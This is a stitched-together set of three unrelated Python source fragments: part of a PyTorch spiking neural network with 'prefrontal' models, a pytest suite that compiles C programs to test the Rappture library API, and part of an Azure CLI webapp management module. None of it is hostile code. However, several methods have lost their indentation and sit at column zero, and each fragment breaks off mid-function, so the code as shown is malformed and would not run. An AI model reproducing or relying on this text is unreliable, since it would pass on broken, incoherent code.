                # accumulate DCN spikes over the inner time loop
                sum_out_m = m_DCN_spike if sum_out_m is None else sum_out_m + m_DCN_spike
        return sum_out_m#, self.monitor_DCN_m
    # def stdp_step(self, reward, lr):
    # r_stdp(self.monitor_PCE_m[0],self.monitor_DCN_m[0],self.m_DCN.weight[:,0:self.num_out_PC], reward,lr=lr)
    # r_stdp(self.monitor_PCI_m[0],self.monitor_DCN_m[0],self.m_DCN.weight[:,self.num_out_PC:2 * self.num_out_PC], reward,lr=lr)
    # r_stdp(self.monitor_GC_m[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,0:self.num_out_GC], reward,lr=lr)
    # r_stdp(self.monitor_GC_u[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,self.num_out_GC:2*self.num_out_GC], reward,lr=lr)
    # r_stdp(self.monitor_GC_sigma[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,2*self.num_out_GC:3*self.num_out_GC], reward,lr=lr)
    # r_stdp(self.monitor_GC_f[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,3*self.num_out_GC:4*self.num_out_GC], reward,lr=lr)
    # r_stdp(self.monitor_GC_m[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,0:self.num_out_GC], reward,lr=lr)
    # r_stdp(self.monitor_GC_u[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,self.num_out_GC:2*self.num_out_GC], reward,lr=lr)
    # r_stdp(self.monitor_GC_sigma[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,2*self.num_out_GC:3*self.num_out_GC], reward,lr=lr)
    # r_stdp(self.monitor_GC_f[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,3*self.num_out_GC:4*self.num_out_GC], reward,lr=lr)
############################################
##############prefrontal model##############
class prefrontal_model_FF(nn.Module):
    """Feed-forward spiking network ("prefrontal" model) with five linear layers.

    Input is expected as (batch, time, 16*4); the forward pass integrates the
    layer membrane states over ``time_window`` steps and returns the summed
    output spikes of the final 4-unit layer.
    """
    def __init__(self, batch_size, num_hidden, N_step, possion_num=50, gpu='0'):
        # FIX: was super(prefrontal_model, self).__init__() which names a
        # *different* class defined later in this file.
        super(prefrontal_model_FF, self).__init__()
        self.batch_size = batch_size
        self.num_hidden = num_hidden
        self.inputnum = 16*4
        self.output = 4
        self.possion_num = possion_num
        self.device = torch.device("cuda:"+gpu if torch.cuda.is_available() else "cpu")
        # layers (``if_bias`` is a module-level flag defined elsewhere in this file)
        self.fc1 = nn.Linear(self.inputnum, self.num_hidden, bias=if_bias)
        self.fc2 = nn.Linear(self.num_hidden, 2*self.num_hidden, bias=if_bias)
        self.fc3 = nn.Linear(2*self.num_hidden, self.num_hidden, bias=if_bias)
        self.fc4 = nn.Linear(self.num_hidden, self.num_hidden, bias=if_bias)
        self.fc5 = nn.Linear(self.num_hidden, self.output, bias=if_bias)
        # monitor buffer (kept for interface compatibility; not written in forward)
        self.monitor_h1 = torch.zeros(self.batch_size, self.num_hidden, self.possion_num).to(self.device)
    def forward(self, input, time_window):
        """Run the spiking forward pass and return the summed output spikes."""
        h1_mem = h1_spike = torch.zeros(self.batch_size, self.num_hidden).to(self.device)
        h2_mem = h2_spike = torch.zeros(self.batch_size, 2*self.num_hidden).to(self.device)
        h3_mem = h3_spike = torch.zeros(self.batch_size, self.num_hidden).to(self.device)
        h4_mem = h4_spike = torch.zeros(self.batch_size, self.num_hidden).to(self.device)
        h5_mem = h5_spike = torch.zeros(self.batch_size, self.output).to(self.device)
        # FIX: the original wrapped the time loop in a redundant outer
        # ``for step in range(time_window)`` (time_window**2 inner iterations,
        # resetting the accumulators each pass) and summed into ``sum_out``,
        # which was never initialized (only sum_out1/2/3 were -> NameError).
        sum_out = None
        for t in range(time_window):
            input_t = input[:, t].float().view(self.batch_size, -1)
            # ``mem_update`` is the file-level LIF membrane-update helper
            h1_mem, h1_spike = mem_update(self.fc1, input_t, h1_mem, h1_spike)
            h2_mem, h2_spike = mem_update(self.fc2, h1_spike, h2_mem, h2_spike)
            h3_mem, h3_spike = mem_update(self.fc3, h2_spike, h3_mem, h3_spike)
            h4_mem, h4_spike = mem_update(self.fc4, h3_spike, h4_mem, h4_spike)
            h5_mem, h5_spike = mem_update(self.fc5, h4_spike, h5_mem, h5_spike)
            sum_out = h5_spike if sum_out is None else sum_out + h5_spike
        return sum_out
class prefrontal_model(nn.Module):
    """Spiking "prefrontal" model with three configurable hidden-layer widths.

    Maps a 16*4 input through five fully connected spiking layers to 4 outputs.
    """
    def __init__(self, batch_size, num_hidden1, num_hidden2, num_hidden3,N_step,possion_num=50,gpu='0'):
        super(prefrontal_model, self).__init__()
        self.batch_size = batch_size
        self.num_hidden1 = num_hidden1
        self.num_hidden2 = num_hidden2
        self.num_hidden3 = num_hidden3
        # flattened input width: 16 features x 4 channels
        self.inputnum = 16*4
        self.output = 4
        self.possion_num = possion_num
        self.device = torch.device("cuda:"+gpu if torch.cuda.is_available() else "cpu")
        #layer (``if_bias`` is a module-level flag defined elsewhere in this file)
        self.fc1 = nn.Linear(self.inputnum, self.num_hidden1, bias = if_bias)
        self.fc2 = nn.Linear(self.num_hidden1, self.num_hidden2, bias = if_bias)
        self.fc3 = nn.Linear(self.num_hidden2, self.num_hidden2, bias = if_bias)
        self.fc4 = nn.Linear(self.num_hidden2, self.num_hidden3, bias = if_bias)
        self.fc5 = nn.Linear(self.num_hidden3, self.output, bias = if_bias)
def forward(self,input, time_window):
'''
input1: (f(x,t), f(y,t))
input2: (u(x,t+n), sigma(x,t+n), u(y,t+n), | |
# repo: codedsk/hubcheck-hubzero-tests (gh_stars: 1-10)
import unittest
import sys
import os
import pytest
import re
from string import Template
import hubcheck
from hubcheck.testcase import TestCase2
from hubcheck.shell import ContainerManager
pytestmark = [ pytest.mark.container,
pytest.mark.rappture,
pytest.mark.weekly,
pytest.mark.reboot
]
SUB_SPACING = 12
TOOL_XML = """
<?xml version="1.0"?>
<run>
<tool>
<about>Press Simulate to view results.</about>
<command>@tool/fermi @driver</command>
</tool>
<input>
<number id="Ef">
<about>
<label>Fermi Level</label>
<description>Energy at center of distribution.</description>
</about>
<units>eV</units>
<min>-10eV</min>
<max>10eV</max>
<default>0.2556eV</default>
</number>
</input>
</run>
""".strip()
@pytest.mark.rappture_c
@pytest.mark.registereduser
@pytest.mark.usefixtures('rappture_version')
class TestContainerRapptureCApi(TestCase2):
    def setup_method(self,method):
        """Open a workspace in a tool session container and cd to $SESSIONDIR."""
        self.remove_files = []
        # get user account info
        self.username,self.userpass = self.testdata.find_account_for('registeredworkspace')
        hubname = self.testdata.find_url_for('https')
        # access a tool session container
        cm = ContainerManager()
        self.ws = cm.access(host=hubname,
                            username=self.username,
                            password=self.userpass)
        self.ws.execute('cd $SESSIONDIR')
        # execute() returns (output, exit_status); keep the session dir path
        self.sessiondir,es = self.ws.execute('pwd')
    def teardown_method(self,method):
        """Remove files created during the test and close the workspace."""
        # remove the executable and config files
        for fname in self.remove_files:
            self.ws.execute('rm -f %s' % (fname))
        # exit the workspace
        self.ws.close()
def write_xml_file(self):
# write xml file
xmlfn = os.path.join(self.sessiondir,"tool.xml")
self.ws.importfile(TOOL_XML,xmlfn,mode=0600,is_data=True)
self.remove_files.append(xmlfn)
def run_code(self,program,xmlfn='tool.xml'):
# write program
programfn = os.path.join(self.sessiondir,"program.c")
self.ws.importfile(program,programfn,mode=0600,is_data=True)
self.remove_files.append(programfn)
# generate path for compiled executable
compiledfn = os.path.join(self.sessiondir,'program')
self.remove_files.append(compiledfn)
# setup rappture environment
self.ws.execute('. /etc/environ.sh')
self.ws.execute('use -e -r %s' % (self.rappture_version))
# setup RAPPTURE_INCLUDE and RAPPTURE_LIB
rpflags = '-I$RAPPTURE_PATH/include'
rpflags += ' -L$RAPPTURE_PATH/lib -lrappture -lexpat -lz -lm'
# compile the code
command = 'gcc -o %s %s %s' % (compiledfn,rpflags,programfn)
self.ws.execute(command)
self.ws.execute('chmod 700 %s' % (compiledfn))
# run the code
command = '%s %s' % (compiledfn,xmlfn)
output,es = self.ws.execute(command,fail_on_exit_code=False)
return output,es
    @pytest.mark.dsktest
    def test_rpLibrary_valid_path(self):
        """
        rpLibrary()
        test the function using an xml file that exists on disk
        """
        # C program exits 0 only when rpLibrary() returns a non-NULL handle
        program = """
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 1;
                lib = rpLibrary(argv[1]);
                if (lib != NULL) {
                    err = 0;
                }
                return err;
            }
        """
        self.write_xml_file()
        output,es = self.run_code(program)
        # check for success
        assert es == 0, \
            "rpLibrary failed to open xml file, es = %s" % (es)
    @pytest.mark.skipif(True,reason="the rappture c api currently does not error on invalid path")
    def test_rpLibrary_invalid_path(self):
        """
        rpLibrary()
        test the function using an xml file that does not exist on disk
        """
        # exits 1 only when rpLibrary() returns NULL for the missing file
        program = """
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                lib = rpLibrary(argv[1]);
                if (lib == NULL) {
                    err = 1;
                }
                return err;
            }
        """
        xmlfn = "tool_does_not_exist.xml"
        output,es = self.run_code(program,xmlfn)
        # check for success
        assert es == 1, \
            "rpLibrary successfully opened a file that does not exist: %s" \
            % (xmlfn)
    @pytest.mark.skipif(True,reason="the rappture c api currently does not error on blank path")
    def test_rpLibrary_no_path(self):
        """
        rpLibrary()
        test the function without giving a filename
        """
        program = """
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                lib = rpLibrary("");
                if (lib == NULL) {
                    err = 1;
                }
                return err;
            }
        """
        output,es = self.run_code(program)
        # check for success
        assert es == 1, \
            "rpLibrary initialized an object with blank filename"
    def test_rpLibrary_null_path(self):
        """
        rpLibrary()
        test the function giving a NULL pointer
        """
        # NULL filename is expected to produce an empty (non-NULL) library
        program = """
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                lib = rpLibrary(NULL);
                if (lib == NULL) {
                    err = 1;
                }
                return err;
            }
        """
        xmlfn = "tool_does_not_exist.xml"
        output,es = self.run_code(program,xmlfn)
        # check for success
        assert es == 0, \
            "rpLibrary failed to initialize an object with NULL filename"
    def test_rpGetString_valid_path(self):
        """
        rpGetString()
        test the function with a valid xml path
        """
        path = "input.number(Ef).about.label"
        # $path is injected into the C source via string.Template
        program = Template("""
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                const char* val = NULL;
                lib = rpLibrary(argv[1]);
                if (lib == NULL) {
                    err = 1;
                    return err;
                }
                err = rpGetString(lib,"$path",&val);
                printf("%s",val);
                return err;
            }
        """).substitute(path=path)
        self.write_xml_file()
        output,es = self.run_code(program)
        # check for success
        assert es == 0, \
            'program exited with status %s while trying to call' % (es) \
            + ' rpGetString with xml path %s' % (path)
        # value comes from the <label> element of TOOL_XML
        expected = 'Fermi Level'
        assert output == expected, \
            "rpGetString returned the wrong data, expected: %s, received: %s" \
            % (expected,output)
    @pytest.mark.skipif(True,reason="the rappture c api currently only returns 0 as an error code")
    def test_rpGetString_invalid_path(self):
        """
        rpGetString()
        test that calling the function with an invalid xml path returns a
        non zero error code.
        """
        path = "input.number(Ef).bad.path"
        program = Template("""
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                const char* val = NULL;
                lib = rpLibrary(argv[1]);
                if (lib == NULL) {
                    err = 1;
                    return err;
                }
                err = rpGetString(lib,"$path",&val);
                if (err == 0) {
                    printf("%s",val);
                }
                return err;
            }
        """).substitute(path=path)
        self.write_xml_file()
        output,es = self.run_code(program)
        # check for success
        assert es == 1, \
            'program exited with status %s while trying to call' % (es) \
            + ' rpGetString with bad xml path %s' % (path)
        expected = ''
        assert output == expected, \
            "rpGetString returned the wrong data, expected: %s, received: %s" \
            % (expected,output)
    def test_rpGetString_null_retcstr(self):
        """
        rpGetString()
        test that calling the function with a NULL retCStr
        non zero error code.
        """
        path = "input.number(Ef).about.label"
        program = Template("""
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                lib = rpLibrary(argv[1]);
                if (lib == NULL) {
                    err = 1;
                    return err;
                }
                err = rpGetString(lib,"$path",NULL);
                return err;
            }
        """).substitute(path=path)
        self.write_xml_file()
        output,es = self.run_code(program)
        # check for segfault (exit status 139 = 128 + SIGSEGV)
        assert es == 139, \
            'program exited with status %s while trying to call' % (es) \
            + ' rpGetString with retCStr == NULL'
    def test_rpGetDouble_valid_path(self):
        """
        rpGetDouble()
        test the function with a valid xml path
        """
        path = "input.number(Ef).default"
        # $path is injected into the C source via string.Template
        program = Template("""
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                double val = 0.0;
                lib = rpLibrary(argv[1]);
                if (lib == NULL) {
                    err = 1;
                    return err;
                }
                err = rpGetDouble(lib,"$path",&val);
                printf("%g",val);
                return err;
            }
        """).substitute(path=path)
        self.write_xml_file()
        output,es = self.run_code(program)
        # check for success
        assert es == 0, \
            'program exited with status %s while trying to call' % (es) \
            + ' rpGetDouble with xml path %s' % (path)
        # numeric part of the <default>0.2556eV</default> element
        expected = '0.2556'
        assert output == expected, \
            "rpGetDouble returned the wrong data, expected: %s, received: %s" \
            % (expected,output)
    @pytest.mark.skipif(True,reason="the rappture c api currently only returns 0 as an error code")
    def test_rpGetDouble_invalid_path(self):
        """
        rpGetDouble()
        test that calling the function with an invalid xml path returns a
        non zero error code.
        """
        path = "input.number(Ef).bad.path"
        program = Template("""
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                double val = 0.0;
                lib = rpLibrary(argv[1]);
                if (lib == NULL) {
                    err = 1;
                    return err;
                }
                err = rpGetDouble(lib,"$path",&val);
                if (err == 0) {
                    printf("%g",val);
                }
                return err;
            }
        """).substitute(path=path)
        self.write_xml_file()
        output,es = self.run_code(program)
        # check for success
        assert es != 0, \
            'program exited with status %s while trying to call' % (es) \
            + ' rpGetDouble with bad xml path %s' % (path)
        expected = '0.2556'
        assert output == '', \
            "rpGetDouble returned the wrong data, expected: %s, received: %s" \
            % (expected,output)
    def test_rpGetDouble_null_retdval(self):
        """
        rpGetDouble()
        test that calling the function with a NULL retDVal
        returns a non zero error code.
        """
        path = "input.number(Ef).default"
        program = Template("""
            #include <stdio.h>
            #include "rappture.h"
            int main(int argc, char* argv[]) {
                RpLibrary* lib = NULL;
                int err = 0;
                lib = rpLibrary(argv[1]);
                if (lib == NULL) {
                    err = 1;
                    return err;
                }
                err = rpGetDouble(lib,"$path",NULL);
                return err;
            }
        """).substitute(path=path)
        self.write_xml_file()
        output,es = self.run_code(program)
        # check for segfault (exit status 139 = 128 + SIGSEGV)
        assert es == 139, \
            'program exited with status %s while trying to call' % (es) \
            + ' rpGetDouble with retDVal == NULL'
def test_rpPutString_valid_path_valid_value(self):
"""
rpPutString()
test the function with a valid xml path and valid value
"""
path = "output.string.current"
val = "my new data"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int | |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=no-self-use,too-many-arguments,too-many-lines
from __future__ import print_function
import json
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from azure.mgmt.web.models import (Site, SiteConfig, User, ServerFarmWithRichSku,
SkuDescription, SslState, HostNameBinding, SiteSourceControl)
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.arm import is_valid_resource_id, parse_resource_id
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.prompting import prompt_pass, NoTTYException
import azure.cli.core.azlogging as azlogging
from azure.cli.core._util import CLIError
from ._params import web_client_factory, _generic_site_operation
logger = azlogging.get_az_logger(__name__)
#pylint:disable=no-member
#workaround that app service's error doesn't comform to LRO spec
class AppServiceLongRunningOperation(LongRunningOperation): #pylint: disable=too-few-public-methods
    """LongRunningOperation wrapper that rewrites App Service error payloads
    into actionable CLIError messages (see module comment above)."""
    def __init__(self, creating_plan=False):
        # NOTE(review): passing ``self`` into the parent initializer looks
        # accidental (it becomes the parent's first positional argument) --
        # confirm against the azure-cli core LongRunningOperation signature.
        super(AppServiceLongRunningOperation, self).__init__(self)
        self._creating_plan = creating_plan
    def __call__(self, poller):
        try:
            return super(AppServiceLongRunningOperation, self).__call__(poller)
        except Exception as ex:
            raise self._get_detail_error(ex)
    def _get_detail_error(self, ex):
        """Extract the service's 'Message' field; specialize known Linux-plan errors."""
        try:
            detail = json.loads(ex.response.text)['Message']
            if self._creating_plan:
                if 'Requested features are not supported in region' in detail:
                    detail = ("Plan with linux worker is not supported in current region. " +
                              "Run 'az appservice list-locations --linux-workers-enabled' " +
                              "to cross check")
                elif 'Not enough available reserved instance servers to satisfy' in detail:
                    detail = ("Plan with Linux worker can only be created in a group " +
                              "which has never contained a Windows worker. Please use " +
                              "a new resource group. Original error:" + detail)
            return CLIError(detail)
        except: #pylint: disable=bare-except
            # payload was not the expected JSON -- fall back to the raw exception
            return ex
def create_webapp(resource_group_name, name, plan):
    """Create a webapp on the given plan; ``plan`` may be a name or a resource id."""
    client = web_client_factory()
    # accept a full resource id for the plan and reduce it to its bare name
    if is_valid_resource_id(plan):
        plan = parse_resource_id(plan)['name']
    site_def = Site(server_farm_id=plan,
                    location=_get_location_from_app_service_plan(client, resource_group_name,
                                                                 plan))
    poller = client.sites.create_or_update_site(resource_group_name, name, site_def)
    return AppServiceLongRunningOperation()(poller)
def show_webapp(resource_group_name, name, slot=None):
    """Fetch a webapp (or slot) and normalize its plan property name."""
    return _rename_server_farm_props(
        _generic_site_operation(resource_group_name, name, 'get_site', slot))
def list_webapp(resource_group_name):
    """List webapps in the group with normalized plan property names."""
    sites = web_client_factory().sites.get_sites(resource_group_name)
    for site in sites:
        _rename_server_farm_props(site)
    return sites
def _rename_server_farm_props(webapp):
#Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
# Thin wrappers over _generic_site_operation: each forwards to the slot-aware
# SDK operation named in the third argument.
def delete_webapp(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'delete_site', slot)
def stop_webapp(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'stop_site', slot)
def start_webapp(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'start_site', slot)
def restart_webapp(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'restart_site', slot)
def get_site_configs(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'get_site_config', slot)
def get_app_settings(resource_group_name, name, slot=None):
    # return only the name->value mapping, not the whole settings resource
    result = _generic_site_operation(resource_group_name, name, 'list_site_app_settings', slot)
    return result.properties
#for any modifications to the non-optional parameters, adjust the reflection logic accordingly
#in the method
def update_site_configs(resource_group_name, name, slot=None,
                        php_version=None, python_version=None,#pylint: disable=unused-argument
                        node_version=None, net_framework_version=None, #pylint: disable=unused-argument
                        java_version=None, java_container=None, java_container_version=None,#pylint: disable=unused-argument
                        remote_debugging_enabled=None, web_sockets_enabled=None,#pylint: disable=unused-argument
                        always_on=None, auto_heal_enabled=None,#pylint: disable=unused-argument
                        use32_bit_worker_process=None,#pylint: disable=unused-argument
                        app_command_line=None):#pylint: disable=unused-argument
    """Update site configuration, applying only the options the caller supplied."""
    configs = get_site_configs(resource_group_name, name, slot)
    import inspect
    frame = inspect.currentframe()
    #note: getargvalues is used already in azure.cli.core.commands.
    #and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame) #pylint: disable=deprecated-method
    for arg in args[3:]:
        # FIX: the original tested ``arg is not None`` -- ``arg`` is the
        # parameter *name* string so the test was always true, and every
        # unspecified (None) option clobbered the existing config value.
        if values[arg] is not None:
            setattr(configs, arg, values[arg])
    return _generic_site_operation(resource_group_name, name, 'update_site_config', slot, configs)
def update_app_settings(resource_group_name, name, settings, slot=None):
    """Merge NAME=VALUE pairs into the app settings and return the new mapping."""
    app_settings = _generic_site_operation(resource_group_name, name,
                                           'list_site_app_settings', slot)
    for entry in settings:
        # split at the first '='; setting names themselves contain no '='
        key, value = entry.split('=', 1)
        app_settings.properties[key] = value
    updated = _generic_site_operation(resource_group_name, name, 'update_site_app_settings',
                                      slot, app_settings)
    return updated.properties
def delete_app_settings(resource_group_name, name, setting_names, slot=None):
    """Remove the named app settings (missing names are ignored) and persist."""
    app_settings = _generic_site_operation(resource_group_name, name,
                                           'list_site_app_settings', slot)
    for key in setting_names:
        app_settings.properties.pop(key, None)
    return _generic_site_operation(resource_group_name, name, 'update_site_app_settings',
                                   slot, app_settings)
# App settings that, together, describe a custom-container configuration.
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', 'DOCKER_CUSTOM_IMAGE_NAME']
def update_container_settings(resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              docker_registry_server_password=None, slot=None):
    """Set Docker-related app settings; only options supplied by the caller are touched."""
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if docker_custom_image_name is not None:
        settings.append('DOCKER_CUSTOM_IMAGE_NAME=' + docker_custom_image_name)
    # reuse the generic app-settings update path, then show only container keys
    settings = update_app_settings(resource_group_name, name, settings, slot)
    return _filter_for_container_settings(settings)
def delete_container_settings(resource_group_name, name, slot=None):
    delete_app_settings(resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(resource_group_name, name, slot=None):
    settings = get_app_settings(resource_group_name, name, slot)
    return _filter_for_container_settings(settings)
def _filter_for_container_settings(settings):
    # keep only the Docker-related keys
    return {x: settings[x] for x in settings if x in CONTAINER_APPSETTING_NAMES}
def add_hostname(resource_group_name, webapp, name, slot=None):
    """Bind hostname ``name`` to a webapp (or one of its slots)."""
    client = web_client_factory()
    webapp = client.sites.get_site(resource_group_name, webapp)
    # NOTE(review): ``webapp`` is now a Site *object*, yet it is passed below
    # as site_name= and as the webapp argument of the create calls, where the
    # SDK presumably expects the site name string -- verify against the SDK.
    binding = HostNameBinding(webapp.location, host_name_binding_name=name, site_name=webapp)
    if slot is None:
        return client.sites.create_or_update_site_host_name_binding(resource_group_name, webapp,
                                                                    name, binding)
    else:
        return client.sites.create_or_update_site_host_name_binding_slot(resource_group_name,
                                                                         webapp, name,
                                                                         binding, slot)
def delete_hostname(resource_group_name, webapp, name, slot=None):
    """Remove a hostname binding from a webapp (or slot)."""
    client = web_client_factory()
    if slot is None:
        return client.sites.delete_site_host_name_binding(resource_group_name, webapp, name)
    else:
        return client.sites.delete_site_host_name_binding_slot(resource_group_name,
                                                               webapp, slot, name)
def list_hostnames(resource_group_name, webapp, slot=None):
    """List hostname bindings of a webapp (or slot)."""
    return _generic_site_operation(resource_group_name, webapp, 'get_site_host_name_bindings',
                                   slot)
#TODO: figure out the 'configuration_source' and add related param descriptions
def create_webapp_slot(resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot, optionally cloning configuration from
    production (configuration_source == webapp) or from another slot."""
    client = web_client_factory()
    site = client.sites.get_site(resource_group_name, webapp)
    location = site.location
    if configuration_source is None:
        slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    elif configuration_source.lower() == webapp.lower(): #clone from production
        slot_def = site #pylint: disable=redefined-variable-type
    else: # from other slot
        # NOTE(review): this fetches ``slot`` (the slot being created) rather
        # than ``configuration_source`` -- looks like a bug; confirm intent.
        slot_def = client.sites.get_site_slot(resource_group_name, webapp, slot)
    poller = client.sites.create_or_update_site_slot(resource_group_name, webapp, slot_def, slot)
    return AppServiceLongRunningOperation()(poller)
def config_source_control(resource_group_name, name, repo_url, repository_type=None, branch=None,
                          manual_integration=None, slot=None):
    """Wire a webapp to an external repository; any type other than 'git'
    is flagged as Mercurial."""
    client = web_client_factory()
    location = _get_location_from_webapp(client, resource_group_name, name)
    source_control = SiteSourceControl(location, repo_url=repo_url, branch=branch,
                                       is_manual_integration=manual_integration,
                                       is_mercurial=(repository_type != 'git'))
    return _generic_site_operation(resource_group_name, name,
                                   'create_or_update_site_source_control',
                                   slot, source_control)
# Source-control helpers: thin wrappers plus local-git enablement.
def show_source_control(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'get_site_source_control', slot)
def delete_source_control(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'delete_site_source_control', slot)
def enable_local_git(resource_group_name, name, slot=None):
    """Switch SCM to LocalGit and return the git remote URL for pushing."""
    client = web_client_factory()
    location = _get_location_from_webapp(client, resource_group_name, name)
    site_config = SiteConfig(location)
    site_config.scm_type = 'LocalGit'
    if slot is None:
        client.sites.create_or_update_site_config(resource_group_name, name, site_config)
    else:
        client.sites.create_or_update_site_config_slot(resource_group_name, name, site_config, slot)
    return {'url' : _get_local_git_url(client, resource_group_name, name, slot)}
def sync_site_repo(resource_group_name, name, slot=None):
    return _generic_site_operation(resource_group_name, name, 'sync_site_repository',
                                   slot)
def list_app_service_plans(resource_group_name=None):
    """List plans in one resource group, or across the subscription when omitted."""
    client = web_client_factory()
    if resource_group_name is not None:
        return client.server_farms.get_server_farms(resource_group_name)
    return client.global_model.get_all_server_farms()
def create_app_service_plan(resource_group_name, name, is_linux, sku='B1', number_of_workers=None,
                            location=None):
    """Create an app service plan; location defaults to the resource group's,
    and ``reserved`` is set (truthy) when a Linux plan is requested."""
    client = web_client_factory()
    sku = _normalize_sku(sku)
    if location is None:
        location = _get_location_from_resource_group(resource_group_name)
    #the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=_get_sku_name(sku), name=sku, capacity=number_of_workers)
    plan_def = ServerFarmWithRichSku(location, server_farm_with_rich_sku_name=name,
                                     sku=sku_def, reserved=(is_linux or None))
    poller = client.server_farms.create_or_update_server_farm(resource_group_name, name, plan_def)
    return AppServiceLongRunningOperation(creating_plan=True)(poller)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
                            admin_site_name=None):
    """Apply in-place updates to a plan instance; untouched options keep
    their existing values. Returns the (mutated) instance."""
    sku_def = instance.sku
    if sku is not None:
        normalized = _normalize_sku(sku)
        sku_def.name = normalized
        sku_def.tier = _get_sku_name(normalized)
    if number_of_workers is not None:
        sku_def.capacity = number_of_workers
    instance.sku = sku_def
    if admin_site_name is not None:
        instance.admin_site_name = admin_site_name
    return instance
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
else:
return sku
def _get_sku_name(tier):
tier = tier.upper()
if tier == 'F1':
return 'FREE'
elif tier == 'D1':
return 'SHARED'
elif tier in ['B1', 'B2', 'B3']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3']:
return 'PREMIUM'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
# Location lookups used to default new resources to their parent's region.
def _get_location_from_resource_group(resource_group_name):
    # local import keeps the resource-management SDK off the module import path
    from azure.mgmt.resource.resources import ResourceManagementClient
    client = get_mgmt_service_client(ResourceManagementClient)
    group = client.resource_groups.get(resource_group_name)
    return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
    webapp = client.sites.get_site(resource_group_name, webapp)
    return webapp.location
def _get_location_from_app_service_plan(client, resource_group_name, plan):
    plan = client.server_farms.get_server_farm(resource_group_name, plan)
    return plan.location
def _get_local_git_url(client, resource_group_name, name, slot=None):
    """Build the authenticated local-git remote URL from the site's repo URL
    and the subscription-wide publishing user."""
    user = client.provider.get_publishing_user()
    result = _generic_site_operation(resource_group_name, name, 'get_site_source_control', slot)
    parsed = urlparse(result.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
                                      parsed.netloc, name)
def _get_scm_url(client, resource_group_name, name, slot=None):
if slot is None:
poller = client.sites.list_site_publishing_credentials(resource_group_name, name,
slot)
else:
poller = client.sites.list_site_publishing_credentials_slot(resource_group_name, name)
result = poller.result()
return result.scm_uri
def set_deployment_user(user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    client = web_client_factory()
    user = User(location='not-really-needed') #TODO: open bug for this one is not needed
    user.publishing_user_name = user_name
    if password is None:
        # interactively prompt; fail cleanly when no TTY is attached
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    user.publishing_password = password
    result = client.provider.update_publishing_user(user)
    return result
def view_in_browser(resource_group_name, name, slot=None):
    """Open the site's default hostname in the default browser, preferring
    https when any hostname binding has SSL enabled."""
    import webbrowser
    site = _generic_site_operation(resource_group_name, name, 'get_site', slot)
    url = site.default_host_name
    ssl_host = next((h for h in site.host_name_ssl_states
                     if h.ssl_state != SslState.disabled), None)
